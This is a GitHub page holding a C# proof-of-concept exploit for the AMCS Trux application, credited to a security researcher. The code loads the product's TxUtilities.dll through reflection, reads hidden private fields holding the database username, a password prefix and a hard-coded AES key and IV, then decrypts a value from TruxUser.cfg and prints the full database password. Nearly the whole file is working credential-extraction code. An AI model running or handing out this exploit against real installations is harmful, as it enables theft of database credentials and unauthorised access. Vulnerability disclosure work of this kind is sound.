-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathProgram.cs
151 lines (122 loc) · 6.05 KB
/
Program.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;
namespace DLLReflectionLoader
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("=========================================================");
Console.WriteLine(" AMCS TRUX 7.19.0018 (219580057) Exploit Proof of Concept");
Console.WriteLine("=========================================================");
Console.WriteLine(" This Proof of Concept (POC) exploits an undisclosed");
Console.WriteLine(" vulnerability in the AMCS Trux application. It is");
Console.WriteLine(" designed to derive encrypted database credentials");
Console.WriteLine(" and hard-coded decryption keys.");
Console.WriteLine(" Author: Bryan Smith, Redline Cyber Security");
Console.WriteLine(" CONFIDENTIAL USE ONLY");
Console.WriteLine("==============================================\n");
// Load the assembly
Console.WriteLine("Loading TxUtilities.dll...");
Assembly assembly = Assembly.LoadFrom("TxUtilities.dll");
// Get the type of the class
Console.WriteLine("Accessing TxUtilities.Database class...");
Type type = assembly.GetType("TxUtilities.Database"); // Adjust the namespace and class name as necessary
if (type == null)
{
Console.WriteLine("ERROR: Class not found.");
return;
}
// Create an instance of the class
Console.WriteLine("Creating an instance of the class...");
object classInstance = Activator.CreateInstance(type);
// Access and output values of the private fields
Console.WriteLine("Retrieving DB User...");
string fieldValue3 = GetPrivateFieldValue<string>(type, classInstance, "\u0003");
Console.WriteLine("DB User retrieved: " + fieldValue3);
Console.WriteLine("Retrieving DB Password (Prefix)...");
string fieldValue5 = GetPrivateFieldValue<string>(type, classInstance, "\u0005");
Console.WriteLine("DB Password (Prefix): " + fieldValue5);
// Read the text file and extract the base64 value
Console.WriteLine("Extracting Base64 value from TruxUser.cfg...");
string base64Value = ExtractBase64Value("TruxUser.cfg");
Console.WriteLine("Config Ciphertext (Base64): " + base64Value);
// Access private fields for IV and KEY
Console.WriteLine("Retrieving AES IV...");
byte[] fieldValueIV = GetPrivateFieldValue<byte[]>(type, classInstance, "\u001A");
Console.WriteLine("AES IV: " + BitConverter.ToString(fieldValueIV));
Console.WriteLine("Retrieving AES KEY...");
byte[] fieldValueKey = GetPrivateFieldValue<byte[]>(type, classInstance, "\u001B");
Console.WriteLine("AES KEY: " + BitConverter.ToString(fieldValueKey));
// Decrypt the ciphertext
Console.WriteLine("Decrypting ciphertext...\n\n");
byte[] cipherTextBytes = Convert.FromBase64String(base64Value);
string decryptedText = DecryptStringFromBytes_Aes(cipherTextBytes, fieldValueKey, fieldValueIV);
// Remove null bytes from the decrypted text
string cleanedText = decryptedText.Replace("\0", string.Empty);
// Output combined Database Password
Console.WriteLine("Database User : [" + fieldValue3 + "]");
Console.WriteLine("Database Password: [" + fieldValue5 + cleanedText + "]");
// Method to get private field value of a specified type
T GetPrivateFieldValue<T>(Type targetType, object instance, string fieldName)
{
FieldInfo fieldInfo = targetType.GetField(fieldName, BindingFlags.NonPublic | BindingFlags.Instance);
T fieldValue = (T)fieldInfo.GetValue(instance);
return fieldValue;
}
Console.WriteLine("\n\nEXPLOIT COMPLETE");
Console.WriteLine("Press any key to exit...");
Console.ReadKey();
}
static string ExtractBase64Value(string fileName)
{
try
{
string line;
using (StreamReader file = new StreamReader(fileName))
{
while ((line = file.ReadLine()) != null)
{
if (line.StartsWith("EP_TC10 :"))
{
return line.Split(':')[1].Trim();
}
}
}
}
catch (Exception ex)
{
Console.WriteLine("Error reading file: " + ex.Message);
}
return null;
}
static string DecryptStringFromBytes_Aes(byte[] cipherText, byte[] Key, byte[] IV)
{
// Declare the string used to hold the decrypted text.
string plaintext = null;
using (Aes aesAlg = Aes.Create())
{
aesAlg.Key = Key;
aesAlg.IV = IV;
// Create a decryptor to perform the stream transform.
ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
// Create the streams used for decryption.
using (MemoryStream msDecrypt = new MemoryStream(cipherText))
{
using (CryptoStream csDecrypt = new CryptoStream(msDecrypt, decryptor, CryptoStreamMode.Read))
{
using (StreamReader srDecrypt = new StreamReader(csDecrypt))
{
// Read the decrypted bytes from the decrypting stream and place them in a string.
plaintext = srDecrypt.ReadToEnd();
}
}
}
}
return plaintext;
}
}
}